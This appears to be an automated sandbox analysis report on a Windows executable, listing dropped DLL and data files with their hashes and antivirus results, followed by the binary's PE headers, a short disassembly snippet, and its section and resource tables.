                                  SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                                  MD5:71AF7ED2A72267AAAD8564524903CFF6
                                  SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                                  SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                                  SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.138910839042951
                                  Encrypted:false
                                  SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                                  MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                                  SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                                  SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                                  SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19248
                                  Entropy (8bit):7.072555805949365
                                  Encrypted:false
                                  SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                                  MD5:19A40AF040BD7ADD901AA967600259D9
                                  SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                                  SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                                  SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18224
                                  Entropy (8bit):7.17450177544266
                                  Encrypted:false
                                  SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                                  MD5:BABF80608FD68A09656871EC8597296C
                                  SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                                  SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                                  SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18232
                                  Entropy (8bit):7.1007227686954275
                                  Encrypted:false
                                  SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                                  MD5:0F079489ABD2B16751CEB7447512A70D
                                  SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                                  SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                                  SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.088693688879585
                                  Encrypted:false
                                  SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                                  MD5:6EA692F862BDEB446E649E4B2893E36F
                                  SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                                  SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                                  SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):22328
                                  Entropy (8bit):6.929204936143068
                                  Encrypted:false
                                  SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                                  MD5:72E28C902CD947F9A3425B19AC5A64BD
                                  SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                                  SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                                  SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18736
                                  Entropy (8bit):7.078409479204304
                                  Encrypted:false
                                  SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                                  MD5:AC290DAD7CB4CA2D93516580452EDA1C
                                  SHA1:FA949453557D0049D723F9615E4F390010520EDA
                                  SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                                  SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20280
                                  Entropy (8bit):7.085387497246545
                                  Encrypted:false
                                  SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                                  MD5:AEC2268601470050E62CB8066DD41A59
                                  SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                                  SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                                  SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.060393359865728
                                  Encrypted:false
                                  SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                                  MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                                  SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                                  SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                                  SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.13172731865352
                                  Encrypted:false
                                  SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                                  MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                                  SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                                  SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                                  SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):28984
                                  Entropy (8bit):6.6686462438397
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):26424
                                  Entropy (8bit):6.712286643697659
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):73016
                                  Entropy (8bit):5.838702055399663
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19256
                                  Entropy (8bit):7.076072254895036
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):22840
                                  Entropy (8bit):6.942029615075195
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):24368
                                  Entropy (8bit):6.873960147000383
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):23488
                                  Entropy (8bit):6.840671293766487
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):20792
                                  Entropy (8bit):7.018061005886957
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):18744
                                  Entropy (8bit):7.127951145819804
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):332752
                                  Entropy (8bit):6.8061257098244905
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):139216
                                  Entropy (8bit):6.841477908153926
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):440120
                                  Entropy (8bit):6.652844702578311
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1244112
                                  Entropy (8bit):6.809431682312062
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):92624
                                  Entropy (8bit):6.639368309935547
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):144336
                                  Entropy (8bit):6.5527585854849395
                                  Encrypted:false
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):1142072
                                  Entropy (8bit):6.809041027525523
                                  Encrypted:false
                                  SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                  MD5:D6326267AE77655F312D2287903DB4D3
                                  SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                  SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                  SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\SysWOW64\svchost.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):83784
                                  Entropy (8bit):6.890347360270656
                                  Encrypted:false
                                  SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                  MD5:7587BF9CB4147022CD5681B015183046
                                  SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                  SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                  SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):7.40937610968776
                                  Encrypted:false
                                  SSDEEP:3072:BqV9Qtmg9VPizP2OU3mVJ8ohgP2pysZbJmb1+TH:KQt/9VPOaW9hxVZFZT
                                  MD5:7294294A8424517CF22221ED3079D34F
                                  SHA1:2E9DBC5F476E47C559426076AFD226B3887D48A0
                                  SHA-256:6374621B5E383341BFCD9F96584C60A7FDB53EE6E39CA1A85D45C6FD4E20499F
                                  SHA-512:93699FB9AF82A8EB4D351D7D3B2808F0DC10A3CF4708614CA6F9B1C4AC7A4615869D8EC84F5051740DE9C047F4D85E791D5B7E248ADB9A1A6B10A77FCB3E1A97
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):91282
                                  Entropy (8bit):7.974690579511391
                                  Encrypted:false
                                  SSDEEP:1536:ieZ1td8Ec+XmohKalLRoBholpMa60M9VPviv7hVWWLqevKcnbBdVGmZulE:zVxFXXhKalWYP1WZviv77W4KSFuu
                                  MD5:B0FF44571856D6A47D4190914963470C
                                  SHA1:459B3EA04D9ED689F71BDDFEB761E272DAA0696A
                                  SHA-256:ED73E205A860919225D097A753EBD8FF234994CFBE56CEFE5AA1FC344CACE85A
                                  SHA-512:BCC8DD04C878D4B1D4757DC6DE7A9B8240867144FC4FD635C758EB2CFEE1ED59A55BA8BE897ADC7299BBA69E5626B4723720714D0370A6FBF11209D4BFDE56AD
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):43582
                                  Entropy (8bit):7.820121629395409
                                  Encrypted:false
                                  SSDEEP:768:P/WdWZiqMol8r/mGmerWFkwAEPrGGihSdAkxRtWDZ9ySMts6SGYpp:PeoZdMhLC6rICSdNxR4FUs6Kpp
                                  MD5:91FE6F30B3BC9D9E2BBC2F7533907999
                                  SHA1:00D14C20216ACB00588AD59FDF6C9131FFA49002
                                  SHA-256:111B5A942AB41F03662697599B3A4FDA2FA629A158D6CF629BBF21B2C5F29E67
                                  SHA-512:C2C035EEF0E0C03B4C5B060E043FBAE1BF56FC516BF171342798E9B448F3647621FD2CC8C88310AB0ADB039D3712F5D39AAFC5BF7B0284A4B61125DDF14EEBC5
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\cJX8BV8LYG.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):86022
                                  Entropy (8bit):4.1788122829966445
                                  Encrypted:false
                                  SSDEEP:1536:Ut1ODIVDKMKKA4PKa4oWUeVVg7kmp5qEXeaSjcyoQ:SMIVcv42oHcDm+EOgg
                                  MD5:FA7E6ED444C613AA118875AE1E02ADF9
                                  SHA1:36B177D785051150B249159B6A5E8C347A6135E1
                                  SHA-256:AA48CB85A03E1DA81574B554D3F4498689CCE04C91712514582F94B012AB73A7
                                  SHA-512:10B0574215E2578B846452378AC99E452351293BF2D8DE651FC7E932C79D5CB1608B56B2D323F17A8ED235264BE18A92117F39D18EDE74A3BD03F6016D215E72
                                  Malicious:false
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.010275118340917
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:cJX8BV8LYG.exe
                                  File size:1'320'960 bytes
                                  MD5:528d3ef48415f22bd277a9759d83a859
                                  SHA1:4ee7ed36eeaceca51e91952d25136f7260be6eab
                                  SHA256:7c5bd51d549520223a57177f6dde2feea2a8e48077a36d73b1c96701360a68a6
                                  SHA512:1409d17a7d5928e66b930401e04263a81a33623de404687c22824a177b879a6a4079d7256cd7e72433575662f62fea38a2fc9bad60d74ab88e5bf728fee6bd78
                                  SSDEEP:24576:GqDEvCTbMWu7rQYlBQcBiT6rprG8a4YuX0JS44JZjwDPy6q6:GTvC/MTQYxsWR7andJSlZ2Py7
                                  TLSH:3A55D0033791C022FF9B95725B56F6565ABCA912013BFA1F13A40D79BEB01B1163E3A3
                                  Icon Hash:145cfcf8f2e8cc52
                                  Entrypoint:0x420577
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x66CBD6F8 [Mon Aug 26 01:14:32 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:948cc502fe9226992dce9417f952fce3
                                  Instruction
                                  call 00007FE488DB0EF3h
                                  jmp 00007FE488DB07FFh
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007FE488DB09DDh
                                  mov dword ptr [esi], 0049FDF0h
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FDF8h
                                  mov dword ptr [ecx], 0049FDF0h
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  push dword ptr [ebp+08h]
                                  mov esi, ecx
                                  call 00007FE488DB09AAh
                                  mov dword ptr [esi], 0049FE0Ch
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  and dword ptr [ecx+04h], 00000000h
                                  mov eax, ecx
                                  and dword ptr [ecx+08h], 00000000h
                                  mov dword ptr [ecx+04h], 0049FE14h
                                  mov dword ptr [ecx], 0049FE0Ch
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  and dword ptr [eax], 00000000h
                                  and dword ptr [eax+04h], 00000000h
                                  push eax
                                  mov eax, dword ptr [ebp+08h]
                                  add eax, 04h
                                  push eax
                                  call 00007FE488DB359Dh
                                  pop ecx
                                  pop ecx
                                  mov eax, esi
                                  pop esi
                                  pop ebp
                                  retn 0004h
                                  lea eax, dword ptr [ecx+04h]
                                  mov dword ptr [ecx], 0049FDD0h
                                  push eax
                                  call 00007FE488DB35E8h
                                  pop ecx
                                  ret
                                  push ebp
                                  mov ebp, esp
                                  push esi
                                  mov esi, ecx
                                  lea eax, dword ptr [esi+04h]
                                  mov dword ptr [esi], 0049FDD0h
                                  push eax
                                  call 00007FE488DB35D1h
                                  test byte ptr [ebp+08h], 00000001h
                                  pop ecx
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x6bda4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x140000 | 0x7594 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |


| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0xd4000 | 0x6bda4 | 0x6be00 | baf607213699d963fd6ea8782542a63b | False | 0.7211150238991889 | data | 7.452145471623723 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x140000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |


| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xd45d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
| RT_ICON | 0xd4700 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
| RT_ICON | 0xd4828 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
| RT_ICON | 0xd4950 | 0xe0be | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9943859283206452 |
| RT_ICON | 0xe2a10 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.2501330888441973 |
| RT_ICON | 0xf3238 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.30849274752995587 |
| RT_ICON | 0xfc6e0 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.31963955637707947 |
| RT_ICON | 0x101b68 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.3098134152102031 |
| RT_ICON | 0x105d90 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.3566390041493776 |
| RT_ICON | 0x108338 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.4268292682926829 |
| RT_ICON | 0x1093e0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | Great Britain | 0.49631147540983606 |
| RT_ICON | 0x109d68 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5886524822695035 |
| RT_MENU | 0x10a1d0 | 0x50 | data | English | Great Britain | 0.9 |
| RT_STRING | 0x10a220 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
| RT_STRING | 0x10a7b4 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
| RT_STRING | 0x10ae40 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
| RT_STRING | 0x10b2d0 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
| RT_STRING | 0x10b8cc | 0x65c | data | English | Great Britain | 0.34336609336609336 |
| RT_STRING | 0x10bf28 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
| RT_STRING | 0x10c390 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
| RT_RCDATA | 0x10c4e8 | 0x33300 | data | | | 1.000338637057387 |
| RT_GROUP_ICON | 0x13f7e8 | 0x84 | data | English | Great Britain | 0.75 |
| RT_GROUP_ICON | 0x13f86c | 0x14 | data | English | Great Britain | 1.25 |
| RT_GROUP_ICON | 0x13f880 | 0x14 | data | English | Great Britain | 1.15 |
| RT_GROUP_ICON | 0x13f894 | 0x14 | data | English | Great Britain | 1.25 |
| RT_VERSION | 0x13f8a8 | 0x10c | data | English | Great Britain | 0.5895522388059702 |
